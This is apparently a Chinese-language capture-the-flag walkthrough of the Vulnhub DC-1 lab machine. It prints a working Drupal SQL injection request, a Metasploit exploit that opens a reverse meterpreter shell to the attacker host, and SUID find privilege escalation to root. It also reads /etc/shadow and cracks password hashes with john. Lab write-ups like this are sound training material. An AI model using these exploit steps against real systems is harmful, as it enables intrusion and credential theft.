2071 字
10 分钟
Vulnhub-DC-1
DC-1
主机发现端口扫描
使用nmap扫描网段类存活主机
因为靶机是我最后添加的,所以靶机IP是
156nmap -sP 192.168.75.0/24 // Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:48 CST Nmap scan report for 192.168.75.1 Host is up (0.00012s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.75.2 Host is up (0.00012s latency). MAC Address: 00:50:56:FB:CA:45 (VMware) Nmap scan report for 192.168.75.156 Host is up (0.00088s latency). MAC Address: 00:0C:29:47:FC:83 (VMware) Nmap scan report for 192.168.75.254 Host is up (0.00042s latency). MAC Address: 00:50:56:FB:E7:F4 (VMware) Nmap scan report for 192.168.75.151 Host is up.扫描主机开放端口
nmap -sT -min-rate 10000 -p- 192.168.75.156 // Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:48 CST Nmap scan report for 192.168.75.156 Host is up (0.00010s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 39179/tcp open unknown MAC Address: 00:0C:29:47:FC:83 (VMware)扫描主机服务版本以及系统版本
nmap -sT -sV -O -p22,80,111,39179 192.168.75.156 // Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:49 CST Nmap scan report for 192.168.75.156 Host is up (0.00054s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 39179/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:47:FC:83 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel扫描漏洞
nmap -script=vuln -p22,80,111,39179 192.168.75.156 Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:54 CST Nmap scan report for 192.168.75.156 Host is up (0.00053s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.156 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.75.156:80/ | Form id: user-login-form | Form action: /node?destination=node | | Path: http://192.168.75.156:80/user/password | Form id: user-pass | Form action: /user/password | | Path: http://192.168.75.156:80/node?destination=node | Form id: user-login-form | Form action: /node?destination=node | | Path: http://192.168.75.156:80/user/register | Form id: user-register-form | Form action: /user/register | | Path: http://192.168.75.156:80/user | Form id: user-login | Form action: /user | | Path: http://192.168.75.156:80/user/ | Form id: user-login |_ Form action: /user/ | http-vuln-cve2014-3704: | VULNERABLE: | Drupal - pre Auth SQL Injection Vulnerability | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2014-3704 | The expandArguments function in the database abstraction API in | Drupal core 7.x before 7.32 does not properly construct prepared | statements, which allows remote attackers to conduct SQL injection | attacks via an array containing crafted keys. | | Disclosure date: 2014-10-15 | References: | http://www.securityfocus.com/bid/70595 | https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704 |_ https://www.drupal.org/SA-CORE-2014-005 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-enum: | /rss.xml: RSS or Atom feed | /robots.txt: Robots file | /UPGRADE.txt: Drupal file | /INSTALL.txt: Drupal file | /INSTALL.mysql.txt: Drupal file | /INSTALL.pgsql.txt: Drupal file | /: Drupal version 7 | /README: Interesting, a readme. | /README.txt: Interesting, a readme. | /0/: Potentially interesting folder |_ /user/: Potentially interesting folder |_http-dombased-xss: Couldn't find any DOM based XSS. 111/tcp open rpcbind 39179/tcp open unknown MAC Address: 00:0C:29:47:FC:83 (VMware)疑似
sql注入和CSRF,以及一些让人感兴趣的目录
web渗透
主页面有三个链接,
loginnew accountreq new password
访问让人感兴趣的目录
robots.txt 列出了很多的目录
User-agent: * Crawl-delay: 10 # Directories Disallow: /includes/ Disallow: /misc/ Disallow: /modules/ Disallow: /profiles/ Disallow: /scripts/ Disallow: /themes/ # Files Disallow: /CHANGELOG.txt Disallow: /cron.php Disallow: /INSTALL.mysql.txt Disallow: /INSTALL.pgsql.txt Disallow: /INSTALL.sqlite.txt Disallow: /install.php Disallow: /INSTALL.txt Disallow: /LICENSE.txt Disallow: /MAINTAINERS.txt Disallow: /update.php Disallow: /UPGRADE.txt Disallow: /xmlrpc.php # Paths (clean URLs) Disallow: /admin/ Disallow: /comment/reply/ Disallow: /filter/tips/ Disallow: /node/add/ Disallow: /search/ Disallow: /user/register/ Disallow: /user/password/ Disallow: /user/login/ Disallow: /user/logout/ # Paths (no clean URLs) Disallow: /?q=admin/ Disallow: /?q=comment/reply/ Disallow: /?q=filter/tips/ Disallow: /?q=node/add/ Disallow: /?q=search/ Disallow: /?q=user/password/ Disallow: /?q=user/register/ Disallow: /?q=user/login/ Disallow: /?q=user/logout/
已知CMS是
Drupal 7PHP 5.4.45Apache 2.2.22Drupal版本可以在install.php找到,打开F12可以找到Drupal 7 (http://drupal.org)晚上查阅漏洞
CVE-2014-3704 Drupal SQL注入漏洞 ,SQL注入,尝试爆出数据
直接放在
bp的重放器使用POST /?q=node&destination=node HTTP/1.1 Host: 192.168.75.156 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 126 pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,database()),0)%23]=bob&name[0]=a用户: dbuser@localhost 当前库: drupaldb 版本: mysql 5.5.60-0+deb7u1尝试了联合语句好像太长了,无法使用漏洞,我们丢给
sqlmap尝试drupaldb没查到任何数据使用MSF搜索漏洞
msf6 > search Drupal Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution 1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection 2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection 3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection 4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution 5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE 6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration 7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution使用第三个,
Drupal HTTP Parameter Key/Value SQL Injectionmsf6 > use exploit/multi/http/drupal_drupageddon [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(multi/http/drupal_drupageddon) > show options msf6 exploit(multi/http/drupal_drupageddon) > set rhosts 192.168.75.156 msf6 exploit(multi/http/drupal_drupageddon) > exploit [*] Started reverse TCP handler on 192.168.75.151:4444 [*] Sending stage (39927 bytes) to 192.168.75.156 [*] Meterpreter session 1 opened (192.168.75.151:4444 -> 192.168.75.156:43212) at 2024-09-28 14:32:44 +0800 meterpreter >拿到shell
提权
查看权限
www-data@DC-1:/var/www$ whoami www-data // www-data@DC-1:/var/www$ uname -a Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux // www-data@DC-1:/var/www$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) // www-data@DC-1:/var/www$ sudo -l bash: sudo: command not found // www-data@DC-1:/var/www$ find / -perm -u=s -type f 2>/dev/null /bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/at /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/procmail /usr/bin/find /usr/sbin/exim4 /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /sbin/mount.nfs当前目录下存在
flag1.txtEvery good CMS needs a config file - and so do you.因为我们查找
/var/www$ find / -perm -u=s -type f 2>/dev/null的时候发现了find有suid权限,所以可以直接提权www-data@DC-1:/var/www$ find flag1.txt -exec 'whoami' \; rootwww-data@DC-1:/var/www$ find flag1.txt -exec '/bin/sh' \; find flag1.txt -exec '/bin/sh' \; # whoami whoami读取
/root下的thefinalflag.txtWell done!!!! Hopefully you've enjoyed this and learned some new skills. You can let me know what you thought of this little journey by contacting me via Twitter - @DCAU7
flag
flag1,在获得shell的时候当前目录下flag2尝试寻找Drupal的数据库配置文件
Sites/default/settings.php,flag2就在里面# cat /var/www/sites/default/settings.php // <?php /** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */ $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupaldb', 'username' => 'dbuser', 'password' => 'R0ck3t', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ), );flag3登录
mysql数据库看看是否存在flagmysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | drupaldb | +--------------------+ // mysql> show tables; +-----------------------------+ | Tables_in_drupaldb | +-----------------------------+ | actions | | authmap | | batch | | block | | block_custom | | block_node_type | | block_role | | blocked_ips | | cache | | cache_block | | cache_bootstrap | | cache_field | | cache_filter | | cache_form | | cache_image | | cache_menu | | cache_page | | cache_path | | cache_update | | cache_views | | cache_views_data | | comment | | ctools_css_cache | | ctools_object_cache | | date_format_locale | | date_format_type | | date_formats | | field_config | | field_config_instance | | field_data_body | | field_data_comment_body | | field_data_field_image | | field_data_field_tags | | field_revision_body | | field_revision_comment_body | | field_revision_field_image | | field_revision_field_tags | | file_managed | | file_usage | | filter | | filter_format | | flood | | history | | image_effects | | image_styles | | menu_custom | | menu_links | | menu_router | | node | | node_access | | node_comment_statistics | | node_revision | | node_type | | queue | | rdf_mapping | | registry | | registry_file | | role | | role_permission | | search_dataset | | search_index | | search_node_links | | search_total | | semaphore | | sequences | | sessions | | shortcut_set | | shortcut_set_users | | system | | taxonomy_index | | taxonomy_term_data | | taxonomy_term_hierarchy | | taxonomy_vocabulary | | url_alias | | users | | users_roles | | variable | | views_display | | views_view | | watchdog | +-----------------------------+ // mysql> select * from users; +-----+--------+---------------------------------------------------------+------------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+------------------------+------+ | uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data | +-----+--------+---------------------------------------------------------+------------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+------------------------+------+ | 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL | | 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; | | 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; | +-----+--------+---------------------------------------------------------+------------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+------------------------+------+尝试使用
john破解admin的密码,53cr3tjohn --wordlist=/usr/share/wordlists/rockyou.txt pass // Using default input encoding: UTF-8 Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 32768 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 53cr3t (?) 1g 0:00:22:32 DONE (2024-09-28 16:03) 0.000739g/s 1657p/s 1657c/s 1657C/s 53cr3t5..539831 Use the "--show" option to display all of the cracked passwords reliably还有一种方法:网上查阅在网站目录的
scripts目录里面有个用于生成密码的password-hash.php文件// 生成 ilovesunset 的密码hash php password-hash.php 'ilovesunset' > 1.txt然后数据库里将密码覆盖上去即可
拿到密码
53cr3t后,登录
点击
find content,存在flag3,内容是flag3 Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.flag4根据提示,
flag4应该在/etc/shadows# cat /etc/shadow // root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7::: daemon:*:17946:0:99999:7::: bin:*:17946:0:99999:7::: sys:*:17946:0:99999:7::: sync:*:17946:0:99999:7::: games:*:17946:0:99999:7::: man:*:17946:0:99999:7::: lp:*:17946:0:99999:7::: mail:*:17946:0:99999:7::: news:*:17946:0:99999:7::: uucp:*:17946:0:99999:7::: proxy:*:17946:0:99999:7::: www-data:*:17946:0:99999:7::: backup:*:17946:0:99999:7::: list:*:17946:0:99999:7::: irc:*:17946:0:99999:7::: gnats:*:17946:0:99999:7::: nobody:*:17946:0:99999:7::: libuuid:!:17946:0:99999:7::: Debian-exim:!:17946:0:99999:7::: statd:*:17946:0:99999:7::: messagebus:*:17946:0:99999:7::: sshd:*:17946:0:99999:7::: mysql:!:17946:0:99999:7::: flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::将
flag4那行保存为flag4再使用john破解,的到密码orangejohn --wordlist=/usr/share/wordlists/rockyou.txt flag4 Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status orange (flag4) 1g 0:00:00:00 DONE (2024-09-28 16:23) 12.50g/s 12800p/s 12800c/s 12800C/s 123456..bethany Use the "--show" option to display all of the cracked passwords reliably Session completed.使用
ssh登录然后读取加目录下的
flag4.txtCan you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is?